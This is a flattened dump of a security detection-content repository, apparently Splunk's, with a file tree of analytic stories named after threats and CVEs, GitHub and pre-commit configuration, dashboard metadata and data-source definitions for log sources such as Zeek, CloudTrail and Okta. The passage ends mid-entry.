3cx_supply_chain_attack.yml ├── abnormal_kubernetes_behavior_using_splunk_infrastructure_monitoring.yml ├── acidpour.yml ├── acidrain.yml ├── active_directory_discovery.yml ├── active_directory_kerberos_attacks.yml ├── active_directory_lateral_movement.yml ├── active_directory_password_spraying.yml ├── active_directory_privilege_escalation.yml ├── adobe_coldfusion_arbitrary_code_execution_cve_2023_29298_cve_2023_26360.yml ├── agenttesla.yml ├── amadey.yml ├── amos_stealer.yml ├── apache_struts_vulnerability.yml ├── apache_tomcat_session_deserialization_attacks.yml ├── apt29_diplomatic_deceptions_with_wineloader.yml ├── asset_tracking.yml ├── asyncrat.yml ├── atlassian_confluence_server_and_data_center_cve_2022_26134.yml ├── awfulshred.yml ├── aws_bedrock_security.yml ├── aws_defense_evasion.yml ├── aws_iam_privilege_escalation.yml ├── aws_identity_and_access_management_account_takeover.yml ├── 
aws_network_acl_activity.yml ├── aws_s3_bucket_security_monitoring.yml ├── aws_security_hub_alerts.yml ├── aws_user_monitoring.yml ├── azorult.yml ├── azure_active_directory_account_takeover.yml ├── azure_active_directory_persistence.yml ├── azure_active_directory_privilege_escalation.yml ├── backdoor_pingpong.yml ├── baron_samedit_cve_2021_3156.yml ├── bishopfox_sliver_adversary_emulation_framework.yml ├── bits_jobs.yml ├── black_basta_ransomware.yml ├── blackbyte_ransomware.yml ├── blacklotus_campaign.yml ├── blackmatter_ransomware.yml ├── blacksuit_ransomware.yml ├── brand_monitoring.yml ├── braodo_stealer.yml ├── brute_ratel_c4.yml ├── cactus_ransomware.yml ├── caddy_wiper.yml ├── chaos_ransomware.yml ├── china_nexus_threat_activity.yml ├── cisa_aa22_257a.yml ├── cisa_aa22_264a.yml ├── cisa_aa22_277a.yml ├── cisa_aa22_320a.yml ├── cisa_aa23_347a.yml ├── cisa_aa24_241a.yml ├── cisco_ios_xe_software_web_management_user_interface_vulnerability.yml ├── cisco_secure_firewall_threat_defense_analytics.yml ├── citrix_netscaler_adc_and_netscaler_gateway_cve_2023_4966.yml ├── citrix_netscaler_adc_cve_2023_3519.yml ├── citrix_sharefile_rce_cve_2023_24489.yml ├── cleo_file_transfer_software.yml ├── clop_ransomware.yml ├── cloud_cryptomining.yml ├── cloud_federated_credential_abuse.yml ├── cobalt_strike.yml ├── coldroot_macos_rat.yml ├── collection_and_staging.yml ├── command_and_control.yml ├── compromised_linux_host.yml ├── compromised_user_account.yml ├── compromised_windows_host.yml ├── confluence_data_center_and_confluence_server_vulnerabilities.yml ├── connectwise_screenconnect_vulnerabilities.yml ├── credential_dumping.yml ├── critical_alerts.yml ├── crushftp_vulnerabilities.yml ├── crypto_stealer.yml ├── cve_2022_40684_fortinet_appliance_auth_bypass.yml ├── cve_2023_21716_word_rtf_heap_corruption.yml ├── cve_2023_22515_privilege_escalation_vulnerability_confluence_data_center_and_server.yml ├── cve_2023_23397_outlook_elevation_of_privilege.yml ├── 
cve_2023_36884_office_and_windows_html_rce_vulnerability.yml ├── cyclops_blink.yml ├── darkcrystal_rat.yml ├── darkgate_malware.yml ├── darkside_ransomware.yml ├── data_destruction.yml ├── data_exfiltration.yml ├── data_protection.yml ├── defense_evasion_or_unauthorized_access_via_sddl_tampering.yml ├── deobfuscate_decode_files_or_information.yml ├── deprecated │ └── .gitkeep ├── derusbi.yml ├── detect_zerologon_attack.yml ├── dev_sec_ops.yml ├── dhs_report_ta18_074a.yml ├── disabling_security_tools.yml ├── dns_amplification_attacks.yml ├── dns_hijacking.yml ├── domain_trust_discovery.yml ├── double_zero_destructor.yml ├── dynamic_dns.yml ├── earth_alux.yml ├── emotet_malware_dhs_report_ta18_201a.yml ├── f5_authentication_bypass_with_tmui.yml ├── f5_big_ip_vulnerability_cve_2022_1388.yml ├── f5_tmui_rce_cve_2020_5902.yml ├── fake_captcha_campaigns.yml ├── fin7.yml ├── flax_typhoon.yml ├── forest_blizzard.yml ├── fortinet_fortinac_cve_2022_39952.yml ├── gcp_account_takeover.yml ├── gcp_cross_account_activity.yml ├── github_malicious_activity.yml ├── gomir.yml ├── gozi_malware.yml ├── graceful_wipe_out_attack.yml ├── hafnium_group.yml ├── handala_wiper.yml ├── hermetic_wiper.yml ├── hidden_cobra_malware.yml ├── icedid.yml ├── iis_components.yml ├── industroyer2.yml ├── information_sabotage.yml ├── ingress_tool_transfer.yml ├── insider_threat.yml ├── ivanti_connect_secure_vpn_vulnerabilities.yml ├── ivanti_epm_vulnerabilities.yml ├── ivanti_epmm_remote_unauthenticated_access.yml ├── ivanti_sentry_authentication_bypass_cve_2023_38035.yml ├── ivanti_virtual_traffic_manager_cve_2024_7593.yml ├── jboss_vulnerability.yml ├── jenkins_server_vulnerabilities.yml ├── jetbrains_teamcity_unauthenticated_rce.yml ├── jetbrains_teamcity_vulnerabilities.yml ├── juniper_junos_remote_code_execution.yml ├── kubernetes_scanning_activity.yml ├── kubernetes_security.yml ├── kubernetes_sensitive_object_access_activity.yml ├── linux_living_off_the_land.yml ├── 
linux_persistence_techniques.yml ├── linux_post_exploitation.yml ├── linux_privilege_escalation.yml ├── linux_rootkit.yml ├── living_off_the_land.yml ├── local_privilege_escalation_with_krbrelayup.yml ├── lockbit_ransomware.yml ├── log4shell_cve_2021_44228.yml ├── lumma_stealer.yml ├── malicious_powershell.yml ├── masquerading___rename_system_utilities.yml ├── medusa_ransomware.yml ├── meduza_stealer.yml ├── metasploit.yml ├── meterpreter.yml ├── microsoft_mshtml_remote_code_execution_cve_2021_40444.yml ├── microsoft_sharepoint_server_elevation_of_privilege_cve_2023_29357.yml ├── microsoft_support_diagnostic_tool_vulnerability_cve_2022_30190.yml ├── monitor_for_updates.yml ├── moonpeak.yml ├── moveit_transfer_authentication_bypass.yml ├── moveit_transfer_critical_vulnerability.yml ├── netsh_abuse.yml ├── network_discovery.yml ├── njrat.yml ├── nobelium_group.yml ├── office_365_account_takeover.yml ├── office_365_collection_techniques.yml ├── office_365_persistence_mechanisms.yml ├── okta_account_takeover.yml ├── okta_mfa_exhaustion.yml ├── openssl_cve_2022_3602.yml ├── orangeworm_attack_group.yml ├── outlook_rce_cve_2024_21378.yml ├── papercut_mf_ng_vulnerability.yml ├── petitpotam_ntlm_relay_on_active_directory_certificate_services.yml ├── phemedrone_stealer.yml ├── php_cgi_rce_attack_on_japanese_organizations.yml ├── plugx.yml ├── possible_backdoor_activity_associated_with_mudcarp_espionage_campaigns.yml ├── prestige_ransomware.yml ├── printnightmare_cve_2021_34527.yml ├── prohibited_traffic_allowed_or_protocol_mismatch.yml ├── proxynotshell.yml ├── proxyshell.yml ├── pxa_stealer.yml ├── qakbot.yml ├── ransomware.yml ├── ransomware_cloud.yml ├── redline_stealer.yml ├── remcos.yml ├── remote_monitoring_and_management_software.yml ├── reverse_network_proxy.yml ├── revil_ransomware.yml ├── rhysida_ransomware.yml ├── router_and_infrastructure_security.yml ├── ryuk_ransomware.yml ├── salt_typhoon.yml ├── samaccountname_spoofing_and_domain_controller_impersonation.yml 
├── samsam_ransomware.yml ├── sandworm_tools.yml ├── sap_netweaver_exploitation.yml ├── scheduled_tasks.yml ├── seashell_blizzard.yml ├── security_solution_tampering.yml ├── shrinklocker.yml ├── signed_binary_proxy_execution_installutil.yml ├── silver_sparrow.yml ├── snake_keylogger.yml ├── snake_malware.yml ├── snappybee.yml ├── sneaky_active_directory_persistence_tricks.yml ├── spearphishing_attachments.yml ├── spring4shell_cve_2022_22965.yml ├── sql_injection.yml ├── sql_server_abuse.yml ├── storm_2460_clfs_zero_day_exploitation.yml ├── subvert_trust_controls_sip_and_trust_provider_hijacking.yml ├── suspicious_aws_login_activities.yml ├── suspicious_aws_s3_activities.yml ├── suspicious_aws_traffic.yml ├── suspicious_cloud_authentication_activities.yml ├── suspicious_cloud_instance_activities.yml ├── suspicious_cloud_provisioning_activities.yml ├── suspicious_cloud_user_activities.yml ├── suspicious_command_line_executions.yml ├── suspicious_compiled_html_activity.yml ├── suspicious_dns_traffic.yml ├── suspicious_emails.yml ├── suspicious_gcp_storage_activities.yml ├── suspicious_mshta_activity.yml ├── suspicious_okta_activity.yml ├── suspicious_regsvcs_regasm_activity.yml ├── suspicious_regsvr32_activity.yml ├── suspicious_rundll32_activity.yml ├── suspicious_windows_registry_activities.yml ├── suspicious_wmi_use.yml ├── suspicious_zoom_child_processes.yml ├── swift_slicer.yml ├── sysaid_on_prem_software_cve_2023_47246_vulnerability.yml ├── systembc.yml ├── termite_ransomware.yml ├── text4shell_cve_2022_42889.yml ├── trickbot.yml ├── trusted_developer_utilities_proxy_execution.yml ├── trusted_developer_utilities_proxy_execution_msbuild.yml ├── unusual_processes.yml ├── use_of_cleartext_protocols.yml ├── valleyrat.yml ├── vanhelsing_ransomware.yml ├── vmware_aria_operations_vrealize_cve_2023_20887.yml ├── vmware_esxi_ad_integration_authentication_bypass_cve_2024_37085.yml ├── vmware_server_side_injection_and_privilege_escalation.yml ├── volt_typhoon.yml ├── 
warzone_rat.yml ├── water_gamayun.yml ├── whispergate.yml ├── windealer_rat.yml ├── windows_applocker.yml ├── windows_attack_surface_reduction.yml ├── windows_audit_policy_tampering.yml ├── windows_bootkits.yml ├── windows_certificate_services.yml ├── windows_defense_evasion_tactics.yml ├── windows_discovery_techniques.yml ├── windows_dns_sigred_cve_2020_1350.yml ├── windows_drivers.yml ├── windows_error_reporting_service_elevation_of_privilege_vulnerability.yml ├── windows_file_extension_and_association_abuse.yml ├── windows_log_manipulation.yml ├── windows_persistence_techniques.yml ├── windows_post_exploitation.yml ├── windows_privilege_escalation.yml ├── windows_registry_abuse.yml ├── windows_service_abuse.yml ├── windows_system_binary_proxy_execution_msiexec.yml ├── winrar_spoofing_attack_cve_2023_38831.yml ├── winter_vivern.yml ├── wordpress_vulnerabilities.yml ├── ws_ftp_server_critical_vulnerabilities.yml ├── xmrig.yml ├── xorddos.yml ├── xworm.yml ├── zdi_can_25373_windows_shortcut_exploit_abused_as_zero_day.yml └── zscaler_browser_proxy_threats.yml └── workbooks └── splunk_psa_0622.json

/.github/CODEOWNERS:
--------------------------------------------------------------------------------
* @patel-bhavin @ljstella
--------------------------------------------------------------------------------

/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
---
name: Feature request
about: Suggest an idea for this project
title: ''
labels: enhancement
assignees: ''
type: "Feature"

---

**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

**Describe the solution you'd like**
A clear and concise description of what you want to happen.

**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.

**Additional context**
Add any other context or screenshots about the feature request here.
--------------------------------------------------------------------------------

/.github/config.yml:
--------------------------------------------------------------------------------
# Configuration for request-info - https://github.com/behaviorbot/request-info

# *Required* Comment to reply with
requestInfoReplyComment: >
  We would appreciate it if you could provide us with more info about this issue/pr!

# *OPTIONAL* default titles to check against for lack of descriptiveness
# MUST BE ALL LOWERCASE
requestInfoDefaultTitles:
  - update readme.md
  - updates


# *OPTIONAL* Label to be added to Issues and Pull Requests with insufficient information given
requestInfoLabelToAdd: needs-more-info
--------------------------------------------------------------------------------

/.github/dependabot.yml:
--------------------------------------------------------------------------------
version: 2
updates:
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
--------------------------------------------------------------------------------

/.github/labeler.yml:
--------------------------------------------------------------------------------
Detections:
  - changed-files:
      - any-glob-to-any-file:
          - detections/**

Stories:
  - changed-files:
      - any-glob-to-any-file: stories/*

Playbooks:
  - changed-files:
      - any-glob-to-any-file: playbooks/*

Macros:
  - changed-files:
      - any-glob-to-any-file: macros/*

Lookups:
  - changed-files:
      - any-glob-to-any-file: lookups/*

Datasource:
  - changed-files:
      - any-glob-to-any-file: data_sources/*

Baselines:
  - changed-files:
      - any-glob-to-any-file: baselines/*
--------------------------------------------------------------------------------

/.github/stale.yml:
--------------------------------------------------------------------------------
# Number of days of inactivity before an issue becomes stale
daysUntilStale: 60
# Number of days of inactivity before a stale issue is closed
daysUntilClose: 7
# Issues with these labels will never be considered stale
exemptLabels:
  - pinned
  - security
# Label to use when marking an issue as stale
staleLabel: wontfix
# Comment to post when marking an issue as stale. Set to `false` to disable
markComment: >
  This issue has been automatically marked as stale because it has not had
  recent activity. It will be closed if no further activity occurs. Thank you
  for your contributions.
# Comment to post when closing a stale issue. Set to `false` to disable
closeComment: false
--------------------------------------------------------------------------------

/.github/workflows/labeler.yml:
--------------------------------------------------------------------------------
name: "Pull Request Labeler"
on:
  - pull_request_target

jobs:
  labeler:
    permissions:
      contents: read
      pull-requests: write
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          repository: "splunk/security_content"
      - uses: actions/labeler@v5
        with:
          sync-labels: true
          configuration-path: '.github/labeler.yml'
--------------------------------------------------------------------------------

/.gitpod.yml:
--------------------------------------------------------------------------------
# This configuration file was automatically generated by Gitpod.
# Please adjust to your needs (see https://www.gitpod.io/docs/config-gitpod-file)
# and commit this file to your remote git repository to share the goodness with others.

image: gitpod/workspace-python-3.9

tasks:
  - init: pip install -r requirements.txt
--------------------------------------------------------------------------------

/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.6.0 # Use the ref you want to point at
    hooks:
      - id: check-executables-have-shebangs
        exclude: "package/bin/da_ess_contentupdate/|package/bin/splunklib/|venv/"
      - id: check-json
      - id: check-symlinks
      - id: check-yaml
      - id: pretty-format-json
        args: [--autofix]
      - id: requirements-txt-fixer
      - id: detect-aws-credentials
      - id: detect-private-key
      - id: forbid-submodules
--------------------------------------------------------------------------------

/.vscode/settings.json:
--------------------------------------------------------------------------------
{
  "python.testing.pytestArgs": [
    "bin/contentctl_project"
  ],
  "python.testing.unittestEnabled": false,
  "python.testing.pytestEnabled": true,
  "python.terminal.activateEnvironment": true,
  "python.envFile": "${workspaceFolder}/.env",
  "python.testing.cwd": "${workspaceFolder}"
}
--------------------------------------------------------------------------------

/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
# Code Of Conduct

The Code of Conduct for this repository can be found online [in our wiki](https://github.com/splunk/security_content/wiki/Code-of-Conduct).
--------------------------------------------------------------------------------

/app_template/README.md:
--------------------------------------------------------------------------------
# Splunk ES Content Update

This subscription service delivers pre-packaged Security Content for use with Splunk Enterprise Security. Subscribers get regular updates to help security practitioners more quickly address ongoing and time-sensitive customer problems and threats.

Requires Splunk Enterprise Security version 4.5 or greater.

For more information please visit the [Splunk ES Content Update user documentation](https://docs.splunk.com/Documentation/ESSOC).
--------------------------------------------------------------------------------

/app_template/default/data/ui/nav/default.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------

/app_template/default/data/ui/views/feedback.xml:
--------------------------------------------------------------------------------
Welcome to the Splunk Enterprise Security Content Updates feedback center.

You can contact the Splunk Threat Research team at research@splunk.com to send us support requests, bug reports, and questions. Specify the request type and the title of any related analytic stories, detections analytics where applicable.
You can also find us on the #es-content-updates Splunk Community Slack channel.
--------------------------------------------------------------------------------

/app_template/default/distsearch.conf:
--------------------------------------------------------------------------------
[replicationSettings:refineConf]
replicate.analytic_stories = false

[replicationDenylist]
excludeESCU = apps[/\\]DA-ESS-ContentUpdate[/\\]lookups[/\\]...
--------------------------------------------------------------------------------

/app_template/metadata/default.meta:
--------------------------------------------------------------------------------
## shared Application-level permissions
[]
access = read : [ * ], write : [ admin, sc_admin ]
export = system

[savedsearches]
owner = admin
--------------------------------------------------------------------------------

/app_template/static/appIcon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIcon.png
--------------------------------------------------------------------------------

/app_template/static/appIconAlt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIconAlt.png
--------------------------------------------------------------------------------

/app_template/static/appIconAlt_2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIconAlt_2x.png
--------------------------------------------------------------------------------

/app_template/static/appIcon_2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIcon_2x.png
--------------------------------------------------------------------------------

/baselines/deprecated/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/baselines/deprecated/.gitkeep
--------------------------------------------------------------------------------

/dashboards/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/dashboards/.gitkeep
--------------------------------------------------------------------------------

/dashboards/applocker.yml:
--------------------------------------------------------------------------------
name: AppLocker
id: b13032c2-f0e2-48ee-8a85-ded8956c012a
version: 1
date: '2024-05-21'
author: Michael Haag, Splunk
description: Utilize this dashboard to assist with auditing and monitoring Windows AppLocker events for your endpoints. Configure the applocker macro to use the AppLocker data source for populating the dashboard.
--------------------------------------------------------------------------------

/dashboards/rmm_software_tracking.yml:
--------------------------------------------------------------------------------
name: RMM Software Tracking
id: 824b748b-9746-4247-b02b-f0961d6f54a5
version: 1
date: '2024-08-05'
author: Steven Dick, Github Community
description: Utilize this dashboard to assist with auditing and monitoring of Remote Monitoring and Management (RMM) alert content.
--------------------------------------------------------------------------------

/dashboards/threat_activity_by_snort_ids.yml:
--------------------------------------------------------------------------------
name: Threat Activity by Snort IDs
id: 77d805c2-747e-4b78-8979-52deca44254f
version: 1
date: '2025-04-29'
author: Bhavin Patel, Nasreddine Bencherchali, Splunk
description: Utilize this panel to correlate Snort intrusion events with known threat activity. Configure the Snort-ID-to-Threat lookup to enrich incoming signature data and populate the “Threat Activity by Snort IDs” view.
--------------------------------------------------------------------------------

/data_sources/aws_cloudtrail.yml:
--------------------------------------------------------------------------------
name: AWS CloudTrail
id: e8ace6db-1dbd-4c72-a1fb-334684619a38
version: 1
date: '2024-07-24'
author: Patrick Bareiss, Splunk
description: All AWS CloudTrail events
source: aws_cloudtrail
sourcetype: aws:cloudtrail
separator: eventName
supported_TA:
- name: Splunk Add-on for AWS
  url: https://splunkbase.splunk.com/app/1876
  version: 7.10.0
--------------------------------------------------------------------------------

/data_sources/aws_cloudtrail_deleteloggingconfiguration.yml:
--------------------------------------------------------------------------------
name: AWS CloudTrail DeleteLoggingConfiguration
id: 24a28726-28f3-4537-a953-71bfbbc3b831
version: 1
date: '2025-02-21'
author: Bhavin Patel, Splunk
description: Data source object for AWS CloudTrail DeleteLoggingConfiguration
source: aws_cloudtrail
sourcetype: aws:cloudtrail
separator: eventName
supported_TA:
- name: Splunk Add-on for AWS
  url: https://splunkbase.splunk.com/app/1876
  version: 7.10.0
fields:
- _time
example_log: ''
--------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /data_sources/aws_cloudtrail_deleterulegroup.yml: -------------------------------------------------------------------------------- 1 | name: AWS CloudTrail DeleteRuleGroup 2 | id: 21c9b538-fa11-4bdf-9138-0dfe06b4d730 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for AWS CloudTrail DeleteRuleGroup 7 | source: aws_cloudtrail 8 | sourcetype: aws:cloudtrail 9 | separator: eventName 10 | supported_TA: 11 | - name: Splunk Add-on for AWS 12 | url: https://splunkbase.splunk.com/app/1876 13 | version: 7.10.0 14 | fields: 15 | - _time 16 | example_log: '' 17 | -------------------------------------------------------------------------------- /data_sources/azure_active_directory.yml: -------------------------------------------------------------------------------- 1 | name: Azure Active Directory 2 | id: 51ca21e5-bda2-4652-bb29-27c7bc18a81c 3 | version: 1 4 | date: '2024-07-18' 5 | author: Patrick Bareiss, Splunk 6 | description: All Azure Active Directory events 7 | source: Azure AD 8 | sourcetype: azure:monitor:aad 9 | separator: operationName 10 | supported_TA: 11 | - name: Splunk Add-on for Microsoft Cloud Services 12 | url: https://splunkbase.splunk.com/app/3110 13 | version: 5.5.0 14 | output_fields: 15 | - dest 16 | - user 17 | - src 18 | - vendor_account 19 | - vendor_product 20 | -------------------------------------------------------------------------------- /data_sources/bro_conn.yml: -------------------------------------------------------------------------------- 1 | name: Bro conn 2 | id: c5a7e93b-2172-45a7-a7e9-3b217255a7f5 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs network connection metadata captured by Zeek (formerly Bro), including 7 | details such as source and destination IPs, ports, connection state, and protocol. 
8 | mitre_components: 9 | - Network Connection Creation 10 | - Network Traffic Flow 11 | - Response Metadata 12 | - Application Log Content 13 | source: bro:conn:json 14 | sourcetype: bro:conn:json 15 | supported_TA: 16 | - name: TA for Zeek 17 | url: https://splunkbase.splunk.com/app/5466 18 | version: 1.0.10 19 | -------------------------------------------------------------------------------- /data_sources/bro_dns.yml: -------------------------------------------------------------------------------- 1 | name: Bro dns 2 | id: a4576cbf-06cc-4ed0-976c-bf06ccaed011 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs DNS queries and responses captured by Zeek (formerly Bro), including 7 | details such as queried domains, resolved IPs, query types, and response codes. 8 | mitre_components: 9 | - Active DNS 10 | - Passive DNS 11 | - Network Traffic Content 12 | - Network Traffic Flow 13 | - Response Metadata 14 | source: bro:dns:json 15 | sourcetype: bro:dns:json 16 | supported_TA: 17 | - name: TA for Zeek 18 | url: https://splunkbase.splunk.com/app/5466 19 | version: 1.0.10 20 | -------------------------------------------------------------------------------- /data_sources/bro_files.yml: -------------------------------------------------------------------------------- 1 | name: Bro files 2 | id: f72d34d0-3495-4826-ad34-d03495782633 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs metadata about files transferred over the network captured by Zeek 7 | (formerly Bro), including details such as file names, hashes, MIME types, and transfer 8 | protocols. 
9 | mitre_components: 10 | - File Metadata 11 | - Network Traffic Content 12 | - Network Traffic Flow 13 | - Response Metadata 14 | - Application Log Content 15 | source: bro:files:json 16 | sourcetype: bro:files:json 17 | supported_TA: 18 | - name: TA for Zeek 19 | url: https://splunkbase.splunk.com/app/5466 20 | version: 1.0.10 21 | -------------------------------------------------------------------------------- /data_sources/bro_http.yml: -------------------------------------------------------------------------------- 1 | name: Bro http 2 | id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2 3 | version: 3 4 | date: '2025-01-23' 5 | author: Patrick Bareiss, Splunk 6 | description: Logs HTTP traffic analyzed by Zeek (formerly Bro), including details 7 | such as request methods, URLs, user agents, response codes, and headers. 8 | mitre_components: 9 | - Network Traffic Content 10 | - Network Traffic Flow 11 | - Response Content 12 | - Response Metadata 13 | - Application Log Content 14 | source: bro:http:json 15 | sourcetype: bro:http:json 16 | supported_TA: 17 | - name: TA for Zeek 18 | url: https://splunkbase.splunk.com/app/5466 19 | version: 1.0.10 20 | -------------------------------------------------------------------------------- /data_sources/bro_loaded_scripts.yml: -------------------------------------------------------------------------------- 1 | name: Bro loaded_scripts 2 | id: 81e08a21-a735-42b1-a08a-21a73582b1bf 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs details about the scripts loaded by Zeek (formerly Bro) during initialization, 7 | including script names and paths. 
8 | mitre_components: 9 | - Application Log Content 10 | - Configuration Modification 11 | - Script Execution 12 | - OS API Execution 13 | source: bro:loaded_scripts:json 14 | sourcetype: bro:loaded_scripts:json 15 | supported_TA: 16 | - name: TA for Zeek 17 | url: https://splunkbase.splunk.com/app/5466 18 | version: 1.0.10 19 | -------------------------------------------------------------------------------- /data_sources/bro_ntp.yml: -------------------------------------------------------------------------------- 1 | name: Bro ntp 2 | id: 3f64a544-47a4-4958-a4a5-4447a47958df 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs Network Time Protocol (NTP) activity captured by Zeek (formerly 7 | Bro), including details such as NTP requests, responses, and server metadata. 8 | mitre_components: 9 | - Network Traffic Flow 10 | - Network Traffic Content 11 | - Response Metadata 12 | - Application Log Content 13 | source: bro:ntp:json 14 | sourcetype: bro:ntp:json 15 | supported_TA: 16 | - name: TA for Zeek 17 | url: https://splunkbase.splunk.com/app/5466 18 | version: 1.0.10 19 | -------------------------------------------------------------------------------- /data_sources/bro_ocsp.yml: -------------------------------------------------------------------------------- 1 | name: Bro ocsp 2 | id: d20909ab-70be-409a-8909-ab70be609af1 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs Online Certificate Status Protocol (OCSP) activity captured by Zeek 7 | (formerly Bro), including details such as certificate validation requests and responses. 
8 | mitre_components: 9 | - Certificate Registration 10 | - Network Traffic Flow 11 | - Network Traffic Content 12 | - Response Metadata 13 | - Application Log Content 14 | source: bro:ocsp:json 15 | sourcetype: bro:ocsp:json 16 | supported_TA: 17 | - name: TA for Zeek 18 | url: https://splunkbase.splunk.com/app/5466 19 | version: 1.0.10 20 | -------------------------------------------------------------------------------- /data_sources/bro_ssl.yml: -------------------------------------------------------------------------------- 1 | name: Bro ssl 2 | id: 22c637eb-f62e-41f0-8637-ebf62e11f0a8 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs SSL/TLS handshake and session details captured by Zeek (formerly 7 | Bro), including certificates, cipher suites, and session information. 8 | mitre_components: 9 | - Certificate Registration 10 | - Network Traffic Flow 11 | - Network Traffic Content 12 | - Response Metadata 13 | - Application Log Content 14 | source: bro:ssl:json 15 | sourcetype: bro:ssl:json 16 | supported_TA: 17 | - name: TA for Zeek 18 | url: https://splunkbase.splunk.com/app/5466 19 | version: 1.0.10 20 | -------------------------------------------------------------------------------- /data_sources/bro_weird.yml: -------------------------------------------------------------------------------- 1 | name: Bro weird 2 | id: e03762c5-c4b8-44e3-b762-c5c4b8e4e3b6 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs anomalous or unexpected network behaviors identified by Zeek (formerly 7 | Bro), including protocol violations and unusual traffic patterns. 
8 | mitre_components: 9 | - Network Traffic Flow 10 | - Network Traffic Content 11 | - Response Metadata 12 | - Application Log Content 13 | - Host Status 14 | source: bro:weird:json 15 | sourcetype: bro:weird:json 16 | supported_TA: 17 | - name: TA for Zeek 18 | url: https://splunkbase.splunk.com/app/5466 19 | version: 1.0.10 20 | -------------------------------------------------------------------------------- /data_sources/bro_x509.yml: -------------------------------------------------------------------------------- 1 | name: Bro x509 2 | id: e8792367-64b0-47e9-b923-6764b0f7e936 3 | version: 2 4 | date: '2025-01-23' 5 | author: Jacob Delgado, SnapAttack 6 | description: Logs details about X.509 certificates observed in network traffic captured 7 | by Zeek (formerly Bro), including certificate fields, validity periods, and issuers. 8 | mitre_components: 9 | - Certificate Registration 10 | - Network Traffic Content 11 | - Response Metadata 12 | - Application Log Content 13 | - Host Status 14 | source: bro:x509:json 15 | sourcetype: bro:x509:json 16 | supported_TA: 17 | - name: TA for Zeek 18 | url: https://splunkbase.splunk.com/app/5466 19 | version: 1.0.10 20 | -------------------------------------------------------------------------------- /data_sources/cisco_ai_defense_alerts.yml: -------------------------------------------------------------------------------- 1 | name: Cisco AI Defense Alerts 2 | id: cbb06880-9dd9-4542-ac60-bd6e1d3c3e4e 3 | version: 1 4 | date: '2024-07-18' 5 | author: Bhavin Patel 6 | description: Data source object for Cisco AI Defense Alerts 7 | source: cisco_ai_defense 8 | sourcetype: cisco:ai:defense 9 | separator: null 10 | supported_TA: 11 | - name: Cisco Security Cloud 12 | url: https://splunkbase.splunk.com/app/7404 13 | version: 3.2.3 14 | fields: null 15 | -------------------------------------------------------------------------------- /data_sources/o365.yml: 
-------------------------------------------------------------------------------- 1 | name: O365 2 | id: b32de97d-0074-4cca-853c-db22c392b6c0 3 | version: 2 4 | date: '2025-01-23' 5 | author: Patrick Bareiss, Splunk 6 | description: Logs management activities in Microsoft 365, including administrative 7 | actions, user activities, and configuration changes across various services. 8 | mitre_components: 9 | - User Account Metadata 10 | - Cloud Service Modification 11 | - Application Log Content 12 | - Configuration Modification 13 | - Active Directory Object Modification 14 | source: o365 15 | sourcetype: o365:management:activity 16 | separator: Operation 17 | supported_TA: 18 | - name: Splunk Add-on for Microsoft Office 365 19 | url: https://splunkbase.splunk.com/app/4055 20 | version: 4.8.1 21 | -------------------------------------------------------------------------------- /data_sources/office_365_universal_audit_log.yml: -------------------------------------------------------------------------------- 1 | name: Office 365 Universal Audit Log 2 | id: 86369e87-5b0b-46fe-8b96-310473dffe7f 3 | version: 1 4 | date: '2025-02-21' 5 | author: Bhavin Patel, Splunk 6 | description: Data source object for Office 365 Universal Audit Log 7 | source: o365 8 | sourcetype: o365:management:activity 9 | separator: Operation 10 | supported_TA: 11 | - name: Splunk Microsoft Office 365 Add-on 12 | url: https://splunkbase.splunk.com/app/4055 13 | version: 4.8.1 14 | fields: 15 | - _time 16 | example_log: '' 17 | -------------------------------------------------------------------------------- /data_sources/okta.yml: -------------------------------------------------------------------------------- 1 | name: Okta 2 | id: ec26febe-e760-4981-bbee-72e107c7b9d2 3 | version: 2 4 | date: '2025-01-23' 5 | author: Patrick Bareiss, Splunk 6 | description: Logs authentication and administrative activities captured by Okta, including 7 | user login attempts, session management, and configuration 
